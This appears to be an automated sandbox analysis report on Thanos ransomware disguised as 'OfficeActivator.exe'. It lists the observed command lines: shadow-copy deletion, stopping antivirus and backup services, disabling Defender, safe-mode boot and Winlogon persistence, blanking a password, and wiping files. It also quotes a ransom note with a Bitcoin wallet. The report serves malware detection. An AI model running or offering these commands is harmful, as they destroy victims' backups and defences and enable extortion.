Analysis Overview
SHA256
8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Threat Level: Known bad
The file OfficeActivator.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies WinLogon for persistence
Thanos executable
Disables service(s)
Contains code to disable Windows Defender
Thanos family
Renames multiple (60) files with added filename extension
Deletes shadow copies
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Impair Defenses: Safe Mode Boot
Drops startup file
Windows security modification
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
Enumerates connected drives
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Interacts with shadow copies
Runs ping.exe
Modifies registry key
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 19:04
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Thanos executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Thanos family
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 19:04
Reported
2024-11-08 19:04
Platform
win7-20240903-en
Max time kernel
3s
Max time network
4s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\system32\reg.exe
"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
C:\Windows\system32\bcdedit.exe
"bcdedit.exe" /set {default} safeboot network
C:\Windows\system32\reg.exe
"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f
C:\Windows\system32\net.exe
"net.exe" user Admin ""
C:\Windows\system32\shutdown.exe
"shutdown.exe" /r /t 0
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin ""
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
memory/2380-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp
memory/2380-1-0x00000000002B0000-0x00000000002CA000-memory.dmp
memory/2380-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
memory/2380-3-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
memory/2756-4-0x0000000002D90000-0x0000000002D91000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 19:04
Reported
2024-11-08 19:06
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Deletes shadow copies
Renames multiple (60) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.55.1.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 179.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/1524-0-0x0000000000B90000-0x0000000000BAA000-memory.dmp
memory/1524-1-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/1524-2-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/432-3-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/432-13-0x000001539DDB0000-0x000001539DDD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mltuvifn.yto.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/432-16-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
C:\ProgramData\Microsoft\User Account Pictures\HOW_TO_DECYPHER_FILES.txt
| MD5 | 00dd1d8e8756229b0e703bcca9c8fa87 |
| SHA1 | 97412aab7aa0663cd7bf7803549c5507834cfdf6 |
| SHA256 | 6d4eabdf7bf6a550fed6004e1636053785b0e877f00e8d624af2f4989a544ae4 |
| SHA512 | 14f3de03ad13eaf8e9ec5175c003a2f4e585ed128a724cbc7c446c717970613f6042ad286f91126391ca7574b9d4610a7ca4e97a77167e7a4247d7e21297f028 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | a08c7c1f9d09a5e493729ff3523b3485 |
| SHA1 | d8392f27046921e1d9c32120b683f207e6f2821d |
| SHA256 | d066f2aeebe7aae32e12b412b505b4528215bce7d9c4efb054450fb0c471d2ad |
| SHA512 | 5345d07e3818b243f4bfcef78ddbc417a108989a97954952798a2bbef2840fda289af1b1c64f4682d0ecfad52e1899858e8bd5462d22dba559c0563214cc2053 |
memory/1524-137-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp